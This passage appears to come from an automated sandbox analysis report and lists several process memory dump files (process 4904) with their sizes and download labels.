Filesize
10.8MB

Download
memory/4904-331-0x000001A5AAB40000-0x000001A5AAB50000-memory.dmp

Filesize
64KB

Download
memory/4904-333-0x00007FFCA1B10000-0x00007FFCA25D1000-memory.dmp

Filesize
10.8MB

Download
memory/4904-330-0x000001A5AAB40000-0x000001A5AAB50000-memory.dmp

Filesize
64KB

Download
memory/4904-318-0x00007FFCA1B10000-0x00007FFCA25D1000-memory.dmp

Filesize
10.8MB

Download
memory/4904-319-0x000001A5AAB40000-0x000001A5AAB50000-memory.dmp

Filesize
64KB

Download